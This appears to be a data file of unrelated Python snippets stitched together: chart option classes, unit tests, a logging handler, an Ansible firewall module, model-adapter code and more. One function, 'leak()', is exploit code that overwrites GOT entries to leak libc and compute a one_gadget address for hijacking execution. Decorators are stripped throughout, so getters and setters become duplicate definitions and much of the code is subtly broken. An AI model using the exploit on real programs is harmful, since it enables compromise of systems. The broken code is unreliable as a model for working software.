def test_mask_with_multi_value(): request_id = '123432' config = RandomStringMaskingConfiguration(length=6) masker = RandomStringRewriteMaskingStrategy(configuration=config) masked = masker.mask(['string to mask', 'another string'], request_id) assert (6 == len(masked[0])) assert (6 == len(masked[1]))
def test_instantiated_regular_class_container_types_object2(instantiate_func: Any) -> None: cfg = {'_target_': 'tests.instantiate.SimpleClass', 'a': [{}, User(name='Bond', age=7)], 'b': None} ret = instantiate_func(cfg, _convert_=ConvertMode.OBJECT) assert isinstance(ret.a, list) assert isinstance(ret.a[0], dict) assert isinstance(ret.a[1], User)
class OptionPlotoptionsPictorialSonificationContexttracksMappingPan(Options): def mapFunction(self): return self._config_get(None) def mapFunction(self, value: Any): self._config(value, js_type=False) def mapTo(self): return self._config_get(None) def mapTo(self, text: str): self._config(text, js_type=False) def max(self): return self._config_get(None) def max(self, num: float): self._config(num, js_type=False) def min(self): return self._config_get(None) def min(self, num: float): self._config(num, js_type=False) def within(self): return self._config_get(None) def within(self, value: Any): self._config(value, js_type=False)
class IndexManagerMixin(): def test_root_has_no_parent(self): with self.assertRaises(IndexError): self.index_manager.get_parent_and_row(Root) def test_root_to_sequence(self): result = self.index_manager.to_sequence(Root) self.assertEqual(result, ()) def test_root_from_sequence(self): result = self.index_manager.from_sequence([]) self.assertIs(result, Root) def test_root_id_round_trip(self): root_id = self.index_manager.id(Root) result = self.index_manager.from_id(root_id) self.assertIs(result, Root) def test_simple_sequence_round_trip(self): sequence = (5,) index = self.index_manager.from_sequence(sequence) result = self.index_manager.to_sequence(index) self.assertEqual(result, sequence) def test_simple_sequence_invalid(self): sequence = ((- 5),) with self.assertRaises(IndexError): self.index_manager.from_sequence(sequence) def test_simple_sequence_to_parent_row(self): sequence = (5,) index = self.index_manager.from_sequence(sequence) result = self.index_manager.get_parent_and_row(index) self.assertEqual(result, (Root, 5)) def test_simple_row_round_trip(self): index = self.index_manager.create_index(Root, 5) result = self.index_manager.get_parent_and_row(index) self.assertEqual(result, (Root, 5)) def test_simple_row_invalid(self): with self.assertRaises(IndexError): self.index_manager.create_index(Root, (- 5)) def test_simple_row_to_sequence(self): index = self.index_manager.create_index(Root, 5) result = self.index_manager.to_sequence(index) self.assertEqual(result, (5,)) def test_simple_id_round_trip(self): index = self.index_manager.create_index(Root, 5) id = self.index_manager.id(index) result = self.index_manager.from_id(id) self.assertEqual(result, index)
_chunk_type class chunk_shutdown(chunk): _PACK_STR = '!BBHI' _MIN_LEN = struct.calcsize(_PACK_STR) def chunk_type(cls): return TYPE_SHUTDOWN def __init__(self, flags=0, length=0, tsn_ack=0): super(chunk_shutdown, self).__init__(self.chunk_type(), length) self.flags = flags self.tsn_ack = tsn_ack def parser(cls, buf): (_, flags, length, tsn_ack) = struct.unpack_from(cls._PACK_STR, buf) msg = cls(flags, length, tsn_ack) return msg def serialize(self): if (0 == self.length): self.length = self._MIN_LEN buf = struct.pack(self._PACK_STR, self.chunk_type(), self.flags, self.length, self.tsn_ack) return buf
def configure_logger(verbose: bool, format_: str) -> None: logger.remove() if (format_ == 'porcelain'): logger.add(sys.stderr, level='CRITICAL') return if (format_ == 'no-color'): logger.add(sys.stderr, level=('DEBUG' if verbose else 'INFO'), colorize=False, format='<level>{message}</level>') else: logger.add(sys.stderr, level=('DEBUG' if verbose else 'INFO'), colorize=True, format='<level>{message}</level>')
def leak(): global one_gadget payload = ('A' * 8) payload += p64(elf.got['free']) payload += ('A' * 8) payload += p64(big_ptr) payload += p32(1) renew(1, payload) renew(2, p64(elf.plt['puts'])) renew(1, p64(elf.got['puts'])) wipe(2) puts_addr = u64((io.recvline()[:6] + '\x00\x00')) libc_base = (puts_addr - libc.symbols['puts']) one_gadget = (libc_base + 283158) log.info(('libc base: 0x%x' % libc_base)) log.info(('one_gadget address: 0x%x' % one_gadget))
class OptionSeriesPieAccessibilityPoint(Options): def dateFormat(self): return self._config_get(None) def dateFormat(self, text: str): self._config(text, js_type=False) def dateFormatter(self): return self._config_get(None) def dateFormatter(self, value: Any): self._config(value, js_type=False) def describeNull(self): return self._config_get(True) def describeNull(self, flag: bool): self._config(flag, js_type=False) def descriptionFormat(self): return self._config_get(None) def descriptionFormat(self, text: str): self._config(text, js_type=False) def descriptionFormatter(self): return self._config_get(None) def descriptionFormatter(self, value: Any): self._config(value, js_type=False) def valueDecimals(self): return self._config_get(None) def valueDecimals(self, num: float): self._config(num, js_type=False) def valueDescriptionFormat(self): return self._config_get('{xDescription}{separator}{value}.') def valueDescriptionFormat(self, text: str): self._config(text, js_type=False) def valuePrefix(self): return self._config_get(None) def valuePrefix(self, text: str): self._config(text, js_type=False) def valueSuffix(self): return self._config_get(None) def valueSuffix(self, text: str): self._config(text, js_type=False)
def sdp_bram(name, width, address_bits): depth = (2 ** address_bits) return '\nmodule {name}(\n // Write port\n input wrclk,\n input [{width}-1:0] di,\n input wren,\n input [{address_bits}-1:0] wraddr,\n // Read port\n input rdclk,\n input rden,\n input [{address_bits}-1:0] rdaddr,\n output reg [{width}-1:0] do);\n\n (* ram_style = "block" *) reg [{width}-1:0] ram[0:{depth}];\n\n always (posedge wrclk) begin\n if(wren == 1) begin\n ram[wraddr] <= di;\n end\n end\n\n always (posedge rdclk) begin\n if(rden == 1) begin\n do <= ram[rdaddr];\n end\n end\n\nendmodule\n '.format(name=name, width=width, address_bits=address_bits, depth=depth)
class OptionPlotoptionsWordcloudSonificationDefaultinstrumentoptionsActivewhen(Options): def crossingDown(self): return self._config_get(None) def crossingDown(self, num: float): self._config(num, js_type=False) def crossingUp(self): return self._config_get(None) def crossingUp(self, num: float): self._config(num, js_type=False) def max(self): return self._config_get(None) def max(self, num: float): self._config(num, js_type=False) def min(self): return self._config_get(None) def min(self, num: float): self._config(num, js_type=False) def prop(self): return self._config_get(None) def prop(self, text: str): self._config(text, js_type=False)
class BaseRunner(object): def __init__(self): identifier = f'D2Go.Runner.{self.__class__.__name__}' torch._C._log_api_usage_once(identifier) logger.info('Initializing control pg') self._control_pg: Optional[dist.ProcessGroup] = None if dist.is_initialized(): logger.info('Create gloo CPU control pg') self._control_pg = dist.new_group(backend=dist.Backend.GLOO, timeout=CONTROL_PG_TIMEOUT) def _initialize(self, cfg): if getattr(self, '_has_initialized', False): logger.warning('Runner has already been initialized, skip initialization.') return self._has_initialized = True self.register(cfg) def register(self, cfg): pass def cleanup(self) -> None: pass def create_shared_context(cls, cfg) -> D2GoSharedContext: pass def get_default_cfg(cls): return get_base_runner_default_cfg(CfgNode()) def build_model(self, cfg, eval_only=False) -> nn.Module: model = build_d2go_model(cfg.clone()).model if eval_only: checkpointer = DetectionCheckpointer(model, save_dir=cfg.OUTPUT_DIR) checkpointer.load(cfg.MODEL.WEIGHTS) model.eval() return model def do_test(self, *args, **kwargs): raise NotImplementedError() def do_train(self, *args, **kwargs): raise NotImplementedError() def build_detection_test_loader(cls, *args, **kwargs): return d2_build_detection_test_loader(*args, **kwargs) def build_detection_train_loader(cls, *args, **kwargs): return d2_build_detection_train_loader(*args, **kwargs)
def balance_outward(view, syntax_name): result = [] for sel in view.sel(): regions = get_regions(view, sel.begin(), syntax_name, 'outward') target_region = sel for r in regions: if (r.contains(sel) and (r.end() > sel.end())): target_region = r break result.append(target_region) return result
def test_pyproject_poetry_parser(): content = '\n [build-system]\n requires = ["poetry-core"]\n build-backend = "poetry.core.masonry.api"\n\n [tool.poetry.dependencies]\n python = "^3.8.1"\n click = "^8.1.7"\n\n [tool.poetry.dev-dependencies]\n black = "*"\n flake8 = "*"\n isort = "*"\n pytest = "*"\n pytest-cov = "*"\n pre-commit = "*"\n ' parser = TomlParser() expected_dependencies = ['python', 'click', 'black', 'flake8', 'isort', 'pytest', 'pytest-cov', 'pre-commit'] assert (parser.parse(content) == expected_dependencies)
class OptionSeriesSolidgaugeSonificationTracksMappingGapbetweennotes(Options): def mapFunction(self): return self._config_get(None) def mapFunction(self, value: Any): self._config(value, js_type=False) def mapTo(self): return self._config_get(None) def mapTo(self, text: str): self._config(text, js_type=False) def max(self): return self._config_get(None) def max(self, num: float): self._config(num, js_type=False) def min(self): return self._config_get(None) def min(self, num: float): self._config(num, js_type=False) def within(self): return self._config_get(None) def within(self, value: Any): self._config(value, js_type=False)
class OptionSeriesAreaSonificationTracksActivewhen(Options): def crossingDown(self): return self._config_get(None) def crossingDown(self, num: float): self._config(num, js_type=False) def crossingUp(self): return self._config_get(None) def crossingUp(self, num: float): self._config(num, js_type=False) def max(self): return self._config_get(None) def max(self, num: float): self._config(num, js_type=False) def min(self): return self._config_get(None) def min(self, num: float): self._config(num, js_type=False) def prop(self): return self._config_get(None) def prop(self, text: str): self._config(text, js_type=False)
class TestSuperFencesCustomValidatorBroken(util.MdCase): extension = ['pymdownx.superfences'] extension_configs = {'pymdownx.superfences': {'custom_fences': [{'name': 'test', 'class': 'test', 'format': custom_format, 'validator': custom_validator_exploder}]}} def test_broken(self): self.check_markdown("\n ```test\n doesn't matter\n ```\n ", '\n <div class="highlight"><pre><span></span><code>doesn&#39;t matter\n </code></pre></div>\n ', True) def test_broken_brace(self): self.check_markdown("\n ```{.test}\n doesn't matter\n ```\n ", '\n <div class="highlight"><pre><span></span><code>doesn&#39;t matter\n </code></pre></div>\n ', True)
def authenticate(allow_refresh_token=False, existing_identity=None): data = request.get_json() username = data.get('email', data.get('username')) password = data.get('password') criterion = [username, password] if (not all(criterion)): logging.error('username or password missing') return (jsonify(error='username or password missing'), 400) identity = jwt_authenticate(username, password) if ((not identity) or (existing_identity and (identity != existing_identity))): logging.error('Invalid Credentials') return (jsonify(error='Invalid Credentials'), 401) if identity.is_blocked: logging.info('Admin has marked this account as spam') return (jsonify(error='Admin has marked this account as spam'), 401) remember_me = data.get('remember-me') include_in_response = data.get('include-in-response') add_refresh_token = (allow_refresh_token and remember_me) expiry_time = (timedelta(minutes=90) if add_refresh_token else None) access_token = create_access_token(identity.id, fresh=True, expires_delta=expiry_time) response_data = {'access_token': access_token} if add_refresh_token: refresh_token = create_refresh_token(identity.id) if include_in_response: response_data['refresh_token'] = refresh_token response = jsonify(response_data) if (add_refresh_token and (not include_in_response)): set_refresh_cookies(response, refresh_token) return response
def possible_subdirs(app: metadata.App): if (app.RepoType == 'srclib'): build_dir = (Path('build/srclib') / app.Repo) else: build_dir = (Path('build') / app.id) last_build = get_last_build_from_app(app) for d in dirs_with_manifest(build_dir): m_paths = common.manifest_paths(d, last_build.gradle) package = common.parse_androidmanifests(m_paths, app)[2] if (package is not None): subdir = d.relative_to(build_dir) logging.debug(('Adding possible subdir %s' % subdir)) (yield subdir)
class FluentHandler(logging.Handler): def __init__(self, tag, host='localhost', port=24224, timeout=3.0, verbose=False, buffer_overflow_handler=None, msgpack_kwargs=None, nanosecond_precision=False, **kwargs): self.tag = tag self._host = host self._port = port self._timeout = timeout self._verbose = verbose self._buffer_overflow_handler = buffer_overflow_handler self._msgpack_kwargs = msgpack_kwargs self._nanosecond_precision = nanosecond_precision self._kwargs = kwargs self._sender = None logging.Handler.__init__(self) def getSenderClass(self): return sender.FluentSender def sender(self): if (self._sender is None): self._sender = self.getSenderInstance(tag=self.tag, host=self._host, port=self._port, timeout=self._timeout, verbose=self._verbose, buffer_overflow_handler=self._buffer_overflow_handler, msgpack_kwargs=self._msgpack_kwargs, nanosecond_precision=self._nanosecond_precision, **self._kwargs) return self._sender def getSenderInstance(self, tag, host, port, timeout, verbose, buffer_overflow_handler, msgpack_kwargs, nanosecond_precision, **kwargs): sender_class = self.getSenderClass() return sender_class(tag, host=host, port=port, timeout=timeout, verbose=verbose, buffer_overflow_handler=buffer_overflow_handler, msgpack_kwargs=msgpack_kwargs, nanosecond_precision=nanosecond_precision, **kwargs) def emit(self, record): data = self.format(record) _sender = self.sender return _sender.emit_with_time(None, (sender.EventTime(record.created) if _sender.nanosecond_precision else int(record.created)), data) def close(self): self.acquire() try: try: self.sender.close() finally: super(FluentHandler, self).close() finally: self.release() def __enter__(self): return self def __exit__(self, exc_type, exc_val, exc_tb): self.close()
class StorageAPI(BaseAPI): _stores: (dict[(str, Store)] | None) _config_data: (ConfigData | None) _data: dict def __init__(self, hass: (HomeAssistant | None), async_on_data_changed: (Callable[([], Awaitable[None])] | None)=None, async_on_status_changed: (Callable[([ConnectivityStatus], Awaitable[None])] | None)=None): super().__init__(hass, async_on_data_changed, async_on_status_changed) self._config_data = None self._stores = None self._data = {} def _storage_config(self) -> Store: storage = self._stores.get(STORAGE_DATA_FILE_CONFIG) return storage def monitored_interfaces(self): result = self.data.get(STORAGE_DATA_MONITORED_INTERFACES, {}) return result def monitored_devices(self): result = self.data.get(STORAGE_DATA_MONITORED_DEVICES, {}) return result def log_incoming_messages(self): result = self.data.get(STORAGE_DATA_LOG_INCOMING_MESSAGES, False) return result def consider_away_interval(self): result = self.data.get(STORAGE_DATA_CONSIDER_AWAY_INTERVAL, DEFAULT_CONSIDER_AWAY_INTERVAL.total_seconds()) return result def update_entities_interval(self): result = self.data.get(STORAGE_DATA_UPDATE_ENTITIES_INTERVAL, DEFAULT_UPDATE_ENTITIES_INTERVAL.total_seconds()) return result def update_api_interval(self): result = self.data.get(STORAGE_DATA_UPDATE_API_INTERVAL, DEFAULT_UPDATE_API_INTERVAL.total_seconds()) return result async def initialize(self, config_data: ConfigData): self._config_data = config_data self._initialize_storages() (await self._async_load_configuration()) def _initialize_storages(self): stores = {} entry_id = self._config_data.entry.entry_id for storage_data_file in STORAGE_DATA_FILES: file_name = f'{DOMAIN}.{entry_id}.{storage_data_file}.json' stores[storage_data_file] = Store(self.hass, STORAGE_VERSION, file_name, encoder=JSONEncoder) self._stores = stores async def _async_load_configuration(self): self.data = (await self._storage_config.async_load()) if (self.data is None): self.data = {STORAGE_DATA_MONITORED_INTERFACES: {}, STORAGE_DATA_MONITORED_DEVICES: {}, STORAGE_DATA_LOG_INCOMING_MESSAGES: False, STORAGE_DATA_CONSIDER_AWAY_INTERVAL: DEFAULT_CONSIDER_AWAY_INTERVAL.total_seconds(), STORAGE_DATA_UPDATE_ENTITIES_INTERVAL: DEFAULT_UPDATE_ENTITIES_INTERVAL.total_seconds(), STORAGE_DATA_UPDATE_API_INTERVAL: DEFAULT_UPDATE_API_INTERVAL.total_seconds()} (await self._async_save()) _LOGGER.debug(f'Loaded configuration data: {self.data}') (await self.set_status(ConnectivityStatus.Connected)) (await self.fire_data_changed_event()) async def _async_save(self): _LOGGER.info(f'Save configuration, Data: {self.data}') (await self._storage_config.async_save(self.data)) (await self.fire_data_changed_event()) async def set_monitored_interface(self, interface_name: str, is_enabled: bool): _LOGGER.debug(f'Set monitored interface {interface_name} to {is_enabled}') self.data[STORAGE_DATA_MONITORED_INTERFACES][interface_name] = is_enabled (await self._async_save()) async def set_monitored_device(self, device_name: str, is_enabled: bool): _LOGGER.debug(f'Set monitored interface {device_name} to {is_enabled}') self.data[STORAGE_DATA_MONITORED_DEVICES][device_name] = is_enabled (await self._async_save()) async def set_log_incoming_messages(self, enabled: bool): _LOGGER.debug(f'Set log incoming messages to {enabled}') self.data[STORAGE_DATA_LOG_INCOMING_MESSAGES] = enabled (await self._async_save()) async def set_consider_away_interval(self, interval: int): _LOGGER.debug(f'Changing {STORAGE_DATA_CONSIDER_AWAY_INTERVAL}: {interval}') self.data[STORAGE_DATA_CONSIDER_AWAY_INTERVAL] = interval (await self._async_save()) async def set_update_entities_interval(self, interval: int): _LOGGER.debug(f'Changing {STORAGE_DATA_UPDATE_ENTITIES_INTERVAL}: {interval}') self.data[STORAGE_DATA_UPDATE_ENTITIES_INTERVAL] = interval (await self._async_save()) async def set_update_api_interval(self, interval: int): _LOGGER.debug(f'Changing {STORAGE_DATA_UPDATE_API_INTERVAL}: {interval}') self.data[STORAGE_DATA_UPDATE_API_INTERVAL] = interval (await self._async_save())
class Field(Html.Html): name = 'Field' def __init__(self, page: primitives.PageModel, html_input, label, icon, width, height, html_code, helper, options, profile): super(Field, self).__init__(page, '', html_code=html_code, profile=profile, css_attrs={'width': width, 'height': height}) self._vals = '' self.add_label(label, html_code=self.htmlCode, css={'height': 'auto', 'margin-top': '1px', 'margin-bottom': '1px'}, position=options.get('position', 'before'), options=options) if (self.label and (options.get('format') == 'column')): self.label.style.css.float = None self.label.style.css.display = 'block' self.label.style.css.color = self.page.theme.notch() self.label.style.css.bold() html_input.style.css.width = 'auto' self.add_helper(helper, css={'line-height': ('%spx' % Defaults.LINE_HEIGHT)}) self.input = html_input if (html_code is not None): if ('name' not in self.input.attr): self.input.attr['name'] = self.input.htmlCode self.append_child(self.input) self.add_icon(icon, html_code=self.htmlCode, position='after', family=options.get('icon_family'), css={'margin-left': '5px', 'color': self.page.theme.colors[(- 1)]}) self.css({'margin-top': '5px'}) def dom(self) -> JsHtmlField.JsHtmlFields: if (self._dom is None): self._dom = JsHtmlField.JsHtmlFields(self, page=self.page) return self._dom def __str__(self): str_div = ''.join([(v.html() if hasattr(v, 'html') else v) for v in self.val]) return ('<div %s>%s%s</div>' % (self.get_attrs(css_class_names=self.style.get_classes()), str_div, self.helper))
class OptionPlotoptionsNetworkgraphSonificationDefaultinstrumentoptionsActivewhen(Options): def crossingDown(self): return self._config_get(None) def crossingDown(self, num: float): self._config(num, js_type=False) def crossingUp(self): return self._config_get(None) def crossingUp(self, num: float): self._config(num, js_type=False) def max(self): return self._config_get(None) def max(self, num: float): self._config(num, js_type=False) def min(self): return self._config_get(None) def min(self, num: float): self._config(num, js_type=False) def prop(self): return self._config_get(None) def prop(self, text: str): self._config(text, js_type=False)
.usefixtures('use_tmpdir') def test_not_executable_job_script_fails_gracefully(): config_file_name = 'config.ert' script_name = 'not-executable-script.py' touch(script_name) config_file_contents = dedent(f'''NUM_REALIZATIONS 1 JOB_SCRIPT {script_name} ''') with open(config_file_name, mode='w', encoding='utf-8') as fh: fh.write(config_file_contents) with pytest.raises(ConfigValidationError, match=f'not executable.*{script_name}'): _ = lark_parse(config_file_name, schema=init_user_config_schema())
def main(): module_spec = schema_to_module_spec(versioned_schema) mkeyname = 'name' fields = {'access_token': {'required': False, 'type': 'str', 'no_log': True}, 'enable_log': {'required': False, 'type': 'bool', 'default': False}, 'vdom': {'required': False, 'type': 'str', 'default': 'root'}, 'member_path': {'required': False, 'type': 'str'}, 'member_state': {'type': 'str', 'required': False, 'choices': ['present', 'absent']}, 'state': {'required': True, 'type': 'str', 'choices': ['present', 'absent']}, 'firewall_schedule_recurring': {'required': False, 'type': 'dict', 'default': None, 'options': {}}} for attribute_name in module_spec['options']: fields['firewall_schedule_recurring']['options'][attribute_name] = module_spec['options'][attribute_name] if (mkeyname and (mkeyname == attribute_name)): fields['firewall_schedule_recurring']['options'][attribute_name]['required'] = True module = AnsibleModule(argument_spec=fields, supports_check_mode=True) check_legacy_fortiosapi(module) is_error = False has_changed = False result = None diff = None versions_check_result = None if module._socket_path: connection = Connection(module._socket_path) if ('access_token' in module.params): connection.set_option('access_token', module.params['access_token']) if ('enable_log' in module.params): connection.set_option('enable_log', module.params['enable_log']) else: connection.set_option('enable_log', False) fos = FortiOSHandler(connection, module, mkeyname) versions_check_result = check_schema_versioning(fos, versioned_schema, 'firewall_schedule_recurring') (is_error, has_changed, result, diff) = fortios_firewall_schedule(module.params, fos, module.check_mode) else: module.fail_json(**FAIL_SOCKET_MSG) if (versions_check_result and (versions_check_result['matched'] is False)): module.warn('Ansible has detected version mismatch between FortOS system and your playbook, see more details by specifying option -vvv') if (not is_error): if (versions_check_result and (versions_check_result['matched'] is False)): module.exit_json(changed=has_changed, version_check_warning=versions_check_result, meta=result, diff=diff) else: module.exit_json(changed=has_changed, meta=result, diff=diff) elif (versions_check_result and (versions_check_result['matched'] is False)): module.fail_json(msg='Error in repo', version_check_warning=versions_check_result, meta=result) else: module.fail_json(msg='Error in repo', meta=result)
(name=st.text(), input_file=st.text()) def test_serialize_deserialize_gen_data_responses(shared_storage, name, input_file): responses = [GenDataConfig(name=name, input_file=input_file)] with open_storage(shared_storage, 'w') as storage: experiment = storage.create_experiment(responses=responses) storage.create_ensemble(experiment, ensemble_size=5) with open_storage(shared_storage) as storage: assert (list(storage.get_experiment(experiment.id).response_configuration.values()) == responses)
class OptionSeriesSankeyOnpointPosition(Options): def offsetX(self): return self._config_get(None) def offsetX(self, num: float): self._config(num, js_type=False) def offsetY(self): return self._config_get(None) def offsetY(self, num: float): self._config(num, js_type=False) def x(self): return self._config_get(None) def x(self, num: float): self._config(num, js_type=False) def y(self): return self._config_get(None) def y(self, num: float): self._config(num, js_type=False)
class OptionPlotoptionsPyramidSonificationTracksMappingGapbetweennotes(Options): def mapFunction(self): return self._config_get(None) def mapFunction(self, value: Any): self._config(value, js_type=False) def mapTo(self): return self._config_get(None) def mapTo(self, text: str): self._config(text, js_type=False) def max(self): return self._config_get(None) def max(self, num: float): self._config(num, js_type=False) def min(self): return self._config_get(None) def min(self, num: float): self._config(num, js_type=False) def within(self): return self._config_get(None) def within(self, value: Any): self._config(value, js_type=False)
def edit_notes(note): if keepmenu.CONF.has_option('database', 'gui_editor'): editor = keepmenu.CONF.get('database', 'gui_editor') editor = shlex.split(editor) else: if keepmenu.CONF.has_option('database', 'editor'): editor = keepmenu.CONF.get('database', 'editor') else: editor = os.environ.get('EDITOR', 'vim') if keepmenu.CONF.has_option('database', 'terminal'): terminal = keepmenu.CONF.get('database', 'terminal') else: terminal = 'xterm' terminal = shlex.split(terminal) editor = shlex.split(editor) editor = ((terminal + ['-e']) + editor) note = (b'' if (note is None) else note.encode(keepmenu.ENC)) with tempfile.NamedTemporaryFile(suffix='.tmp') as fname: fname.write(note) fname.flush() editor.append(fname.name) try: call(editor) except FileNotFoundError: dmenu_err('Terminal not found. Please update config.ini.') note = ('' if (not note) else note.decode(keepmenu.ENC)) return note fname.seek(0) note = fname.read() note = ('' if (not note) else note.decode(keepmenu.ENC)) return note.strip()
def main(): logging.info('Creating Cerebro') cerebro = bt.Cerebro() logging.info('Initializing Kiwoom Store') kiwoomstore = KiwoomOpenApiPlusStore() logging.info('Getting data') historial_data = kiwoomstore.getdata(dataname='005930', historical=True) realtime_data = kiwoomstore.getdata(dataname='005930', backfill_start=False, timeframe=bt.TimeFrame.Ticks, compression=1) logging.info('Adding data') cerebro.adddata(historial_data) logging.info('Configuring others') cerebro.addsizer(bt.sizers.FixedSize, stake=10) cerebro.addtz('Asia/Seoul') cerebro.broker.setcash(.0) cerebro.broker.addcommissioninfo(KiwoomOpenApiPlusCommInfo()) logging.info('Setting strategy') cerebro.addstrategy(OrclStrategy, printlog=True) logging.info('Starting Portfolio Value: %.2f', cerebro.broker.getvalue()) cerebro.run() logging.info('Final Portfolio Value: %.2f', cerebro.broker.getvalue())
def test_entries_size_0_values(tmpdir, merge_lis_prs): fpath = os.path.join(str(tmpdir), 'entries-size-0.lis') content = ((headers + ['data/lis/records/curves/dfsr-entries-size-0.lis.part']) + trailers) merge_lis_prs(fpath, content) with lis.load(fpath) as (f,): dfs = f.data_format_specs()[0] assert (len(dfs.entries) == 16) entries = {entry.type: entry.value for entry in dfs.entries} assert (entries[0] == None) assert (dfs.record_type == None) assert (dfs.spec_block_type == None) assert (dfs.frame_size == None) assert (dfs.direction == None) assert (dfs.optical_log_depth_units == None) assert (dfs.reference_point == None) assert (dfs.reference_point_units == None) assert (dfs.spacing == None) assert (dfs.spacing_units == None) assert (dfs.max_frames == None) assert (dfs.absent_value == None) assert (dfs.depth_mode == None) assert (dfs.depth_units == None) assert (dfs.depth_reprc == None) assert (dfs.spec_block_subtype == None)
class OptionSeriesHeatmapSonificationContexttracksMappingTremoloDepth(Options): def mapFunction(self): return self._config_get(None) def mapFunction(self, value: Any): self._config(value, js_type=False) def mapTo(self): return self._config_get(None) def mapTo(self, text: str): self._config(text, js_type=False) def max(self): return self._config_get(None) def max(self, num: float): self._config(num, js_type=False) def min(self): return self._config_get(None) def min(self, num: float): self._config(num, js_type=False) def within(self): return self._config_get(None) def within(self, value: Any): self._config(value, js_type=False)
class IPAdapter(Generic[T], fl.Chain, Adapter[T]): _clip_image_encoder: list[CLIPImageEncoderH] _grid_image_encoder: list[CLIPImageEncoderH] _image_proj: list[fl.Module] def __init__(self, target: T, clip_image_encoder: CLIPImageEncoderH, image_proj: fl.Module, scale: float=1.0, fine_grained: bool=False, weights: (dict[(str, Tensor)] | None)=None) -> None: with self.setup_adapter(target): super().__init__(target) self.fine_grained = fine_grained self._clip_image_encoder = [clip_image_encoder] if fine_grained: self._grid_image_encoder = [self.convert_to_grid_features(clip_image_encoder)] self._image_proj = [image_proj] self.sub_adapters = [CrossAttentionAdapter(target=cross_attn, scale=scale, image_sequence_length=self.image_proj.num_tokens) for cross_attn in filter((lambda attn: (type(attn) != fl.SelfAttention)), target.layers(fl.Attention))] if (weights is not None): image_proj_state_dict: dict[(str, Tensor)] = {k.removeprefix('image_proj.'): v for (k, v) in weights.items() if k.startswith('image_proj.')} self.image_proj.load_state_dict(image_proj_state_dict) for (i, cross_attn) in enumerate(self.sub_adapters): cross_attn_state_dict: dict[(str, Tensor)] = {} for (k, v) in weights.items(): prefix = f'ip_adapter.{i:03d}.' if (not k.startswith(prefix)): continue cross_attn_state_dict[k.removeprefix(prefix)] = v cross_attn.load_state_dict(state_dict=cross_attn_state_dict) def clip_image_encoder(self) -> CLIPImageEncoderH: return self._clip_image_encoder[0] def grid_image_encoder(self) -> CLIPImageEncoderH: assert hasattr(self, '_grid_image_encoder') return self._grid_image_encoder[0] def image_proj(self) -> fl.Module: return self._image_proj[0] def inject(self: 'TIPAdapter', parent: (fl.Chain | None)=None) -> 'TIPAdapter': for adapter in self.sub_adapters: adapter.inject() return super().inject(parent) def eject(self) -> None: for adapter in self.sub_adapters: adapter.eject() super().eject() def set_scale(self, scale: float) -> None: for cross_attn in self.sub_adapters: cross_attn.scale = scale def compute_clip_image_embedding(self, image_prompt: Tensor) -> Tensor: image_encoder = (self.clip_image_encoder if (not self.fine_grained) else self.grid_image_encoder) clip_embedding = image_encoder(image_prompt) conditional_embedding = self.image_proj(clip_embedding) if (not self.fine_grained): negative_embedding = self.image_proj(zeros_like(clip_embedding)) else: clip_embedding = image_encoder(zeros_like(image_prompt)) negative_embedding = self.image_proj(clip_embedding) return cat((negative_embedding, conditional_embedding)) def preprocess_image(self, image: Image.Image, size: tuple[(int, int)]=(224, 224), mean: (list[float] | None)=None, std: (list[float] | None)=None) -> Tensor: return normalize(image_to_tensor(image.resize(size), device=self.target.device, dtype=self.target.dtype), mean=([0., 0.4578275, 0.] if (mean is None) else mean), std=([0., 0., 0.] if (std is None) else std)) def convert_to_grid_features(clip_image_encoder: CLIPImageEncoderH) -> CLIPImageEncoderH: encoder_clone = clip_image_encoder.structural_copy() assert isinstance(encoder_clone[(- 1)], fl.Linear) assert isinstance(encoder_clone[(- 2)], fl.LayerNorm) assert isinstance(encoder_clone[(- 3)], fl.Lambda) for _ in range(3): encoder_clone.pop() transfomer_layers = encoder_clone[(- 1)] assert (isinstance(transfomer_layers, fl.Chain) and (len(transfomer_layers) == 32)) transfomer_layers.pop() return encoder_clone
.parametrize('elasticapm_client', [{'span_stack_trace_min_duration': 0}], indirect=True) def test_transaction_span_stack_trace_min_duration_no_limit(elasticapm_client): elasticapm_client.begin_transaction('test_type') with elasticapm.capture_span('frames'): pass with elasticapm.capture_span('frames', duration=0.04): pass elasticapm_client.end_transaction('test') spans = elasticapm_client.events[constants.SPAN] assert (len(spans) == 2) assert (spans[0]['name'] == 'frames') assert (spans[0]['stacktrace'] is not None) assert (spans[1]['name'] == 'frames') assert (spans[1]['stacktrace'] is not None)
def find_best_vyper_version(contract_sources: Dict[(str, str)], install_needed: bool=False, install_latest: bool=False, silent: bool=True) -> str: (available_versions, installed_versions) = _get_vyper_version_list() for (path, source) in contract_sources.items(): pragma_spec = sources.get_vyper_pragma_spec(source, path) installed_versions = [i for i in installed_versions if (i in pragma_spec)] available_versions = [i for i in available_versions if (i in pragma_spec)] if (not available_versions): raise IncompatibleVyperVersion('No installable vyper version compatible across all sources') if ((not installed_versions) and (not (install_needed or install_latest))): raise IncompatibleVyperVersion('No installed vyper version compatible across all sources') if (max(available_versions) > max(installed_versions, default=Version('0.0.0'))): if (install_latest or (install_needed and (not installed_versions))): install_vyper(max(available_versions)) return str(max(available_versions)) if (not silent): print(f'New compatible vyper version available: {max(available_versions)}') return str(max(installed_versions))
def test(): assert ('from spacy.tokens import Doc' in __solution__), 'Importes-tu correctement la classe Doc ?' assert (doc.text == 'spaCy est cool.'), "Es-tu certain d'avoir cree correctement le Doc ?" assert ('print(doc.text)' in __solution__), 'Affiches-tu le texte du Doc ?' __msg__.good('Bien joue !')
class OptionPlotoptionsVariwideSonificationDefaultinstrumentoptionsMappingPan(Options): def mapFunction(self): return self._config_get(None) def mapFunction(self, value: Any): self._config(value, js_type=False) def mapTo(self): return self._config_get(None) def mapTo(self, text: str): self._config(text, js_type=False) def max(self): return self._config_get(None) def max(self, num: float): self._config(num, js_type=False) def min(self): return self._config_get(None) def min(self, num: float): self._config(num, js_type=False) def within(self): return self._config_get(None) def within(self, value: Any): self._config(value, js_type=False)
def urlHead(url, timeout=3, allow_redirects=True): if (not url): return (False, {}) try: resp = requests.head(url, timeout=timeout, allow_redirects=allow_redirects) return (True, resp) except Exception as e: print(f'[ERROR] urlHead failed: {e}') return (False, {})